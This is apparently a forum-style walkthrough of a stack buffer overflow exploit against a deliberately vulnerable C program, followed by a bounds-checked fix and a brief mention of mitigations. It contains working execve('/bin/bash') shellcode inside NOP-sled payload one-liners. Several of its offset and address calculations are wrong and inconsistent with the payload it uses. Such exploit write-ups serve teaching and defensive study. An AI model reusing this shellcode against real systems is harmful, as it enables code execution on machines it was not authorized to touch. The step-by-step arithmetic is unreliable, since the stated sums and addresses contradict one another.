2. Make the vulnerable application
// deliberately vulnerable test program: copies argv[1] into a fixed
// 500-byte stack buffer with strcpy, which performs no bounds check
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv)
{
    char buffer[500];
    strcpy(buffer, argv[1]); // overflows when argv[1] is longer than 499 bytes
    return 0;
}
3. Compile the vulnerable application
4. Now we can find the offset needed to trigger the overflow and overwrite EIP
5. Check whether the buffer already overwrites the EIP and ESP values
6. Find the address for EIP
So we get the EIP address 0xbffff12c, but this is not the real ESP address; we need to decrease it by 200 bytes, so my EIP address becomes 0xbfffef2c (calculated with KCalc).
Now we know we need 508 bytes, from this formula:
323 bytes of junk + a shellcode of 45 bytes = 408 bytes.
508 bytes - 408 bytes = 100 bytes.
So after the shellcode we still have 100 bytes; we divide 100 by 4 (the size of one memory address,
e.g. \x41\x41\x41\x41) and get 35.
7. Generate the shellcode with sc_generate, length 45 bytes
$(python -c 'print "\x90"*323 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x2c\xfe\xff\xbf"*35')
Modified exploit (NOP sled increased to 370 bytes):
$(python -c 'print "\x90"*370 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x2c\xfe\xff\xbf"*35')
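As an added example (not code from the original post), here is the program from step 2 with the strcpy replaced by a bounded copy that rejects any input that does not fit the 500-byte buffer, so the 508-byte payload computed in step 6 is refused instead of overwriting the saved EIP. The names safe_copy and try_input_of_length are mine, and the 'A' inputs are constructed for the demonstration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 500   /* same buffer size as the vulnerable program */

/* Bounded copy: returns 0 on success, -1 if src (plus its terminating NUL)
   would not fit in dst_size bytes. Never writes past dst[dst_size - 1]. */
int safe_copy(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    size_t len = strlen(src);
    if (len >= dst_size)
        return -1;                 /* would overflow: reject, do not silently truncate */
    memcpy(dst, src, len + 1);     /* copies the NUL terminator too */
    return 0;
}

/* Constructed input of n 'A' bytes (like the exploit's padding) copied into a
   BUF_SIZE stack buffer; returns 0 if accepted, -1 if rejected as too long. */
int try_input_of_length(size_t n)
{
    char buffer[BUF_SIZE];
    char *input = malloc(n + 1);
    if (input == NULL)
        return -1;
    memset(input, 'A', n);
    input[n] = '\0';
    int rc = safe_copy(buffer, sizeof buffer, input);
    free(input);
    return rc;
}

int main(int argc, char **argv)
{
    char buffer[BUF_SIZE];
    if (argc < 2) {                /* the original also crashes when run with no argument */
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (safe_copy(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "input too long (max %zu bytes)\n", (size_t)(BUF_SIZE - 1));
        return 1;
    }
    printf("copied %zu bytes\n", strlen(buffer));
    return 0;
}
```

Stack canaries, NX and ASLR are separate compiler and kernel mitigations that make the overflow harder to exploit; the bounds check removes the bug itself.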
What is sc_generate? I can't really find it on Google, and it doesn't seem to exist on my BackTrack.